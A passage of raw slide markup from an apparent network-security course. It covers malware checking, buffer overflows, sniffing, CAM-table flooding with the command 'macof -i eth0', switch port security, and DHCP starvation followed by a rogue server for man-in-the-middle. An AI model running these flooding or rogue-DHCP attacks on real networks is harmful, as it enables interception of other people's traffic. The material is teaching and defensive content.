              <a:t>Check md5s/hashes when downloading, even if you are downloading from the main site (beware on DNS spoofing)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Sheep Dip Systems (Dip your sheep first to kill the parasites). Run the program / connect the USB, … and check all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>processes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, file hashes, network connections, … before and after. Isolate it.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Debugging / Disassembling tools (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>bintext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> searches for text, OllyDbg, IDAPro, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Ghidra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>,  …) or checking UPX  (packager) to check software packages and licences ( upx -L filename) </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>UTM (Unified </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Threat Management) + checking threat with the cloud. The cloud service can even check and update the Firewall (Say </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>VirusTotal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>.com)</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71"/>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Buffer overflow</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29" name="Google Shape;429;p71"/>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What it means</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>alloc and pointers</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Stack smashing (overwriting or corrupting the return pointer)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Adding NoP to memory and then jump, just like an airplane sliding on a loooong strip. Kind of padding the memory</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Why</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>DoS + Bypass security + Or even run code (say for opening a port)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>C &amp; C++ do not automatically check for this. </a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>trcpy can copy data into memory</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Check ‘code red’</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>IDS/IPS on Host + writing good code with boundary validation + having cookies (canary value) in memory and checking them + stack guard (saving return values and checking them) + using tools like splint (checks for BO possibilities) + logs</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>On hardware level, there are NX (no exec) or XD (exec disabled) flags for memory</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>heartbleed</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7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Sniffing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="435" name="Google Shape;435;p72"/>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rgbClr val="F6F2D2"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>HTTP, Telnet, email, ftp, rlogin, POP, IMAP, … </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Software (snort, winpcap, wireshark, tcpdump,...) vs Hardware (protocol analyzer)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Detection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Finding promiscuous interfaces using a ping to unknown IP &amp; MAC and seeing answers or using NMAP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="436" name="Google Shape;436;p72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="792550" y="2081550"/>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Clr>
                <a:srgbClr val="F6F2D2"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Wiretapping on network</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>How</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Passive</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Active</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>we have to be in Promiscuous mode to read all FRAMES (layer 2) and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>won't</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> filter only for our own MAC. “ifconfig -a” will show if we are in promiscuous mode</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>MAC flooding (send too many to overflow the CAM)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>DHCP attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ARP P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>oisoning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Poisoning</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Spanning on switch</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7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a sniffer</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42" name="Google Shape;442;p73"/>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200"/>
              <a:t>wireshark, tcpdump, windump, omnipeek, dsniff, etherape, msn sniffer, …</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>filters:</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>==, eq, !=, ne, contains</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>addr, tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>port, ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>src, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ontains</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tcpdump -w output.pcap</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CLI Tools</a:t>
            </a:r>
            <a:endParaRPr sz="1200">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tshark (cli version)</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dumpcap (capturing)</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capinfos (stats about a capture)</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editcap (edit or translate format of capture)</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mergecap (combines captures)</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text2cap (cap from hex dump of packets)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt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74"/>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CAM table &amp; Port security</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48" name="Google Shape;448;p74"/>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m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>acof utility from dsniff</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>macof -i eth0 -&gt; will overflow the mac and the next packets would be sent to all ports to work!</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>If we turn on port security on a port, this will be resolved. There are some steps when we get MAC address beyond our limit (say 5):</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>P: protect</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>R: protect + sending alerts and messages (syslog, counter, snmp, ..)</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>S [ default] : shutdown the port </a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>S: shutdown the whole v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>an</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>To turn on port security you will go to the switch and in config mode, will do a “switchport port-security maximum 5” on that port and “switchport port-security violation restrict” and enable the feature “switchport port-security”  and check with “show port-security”</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7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DHCP Snooping</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54" name="Google Shape;454;p75"/>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200"/>
              <a:t>DHCP:</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Discover</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Offer</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Request</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Acknowledge</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>This can happen by mistake or by a plan!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Attack:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>First we will do DHCP starvation attack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Then our DHCP server can also work as a router</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Sniffing, MITM, … </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>On wireshark you can see this by filtering for “bootp”</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
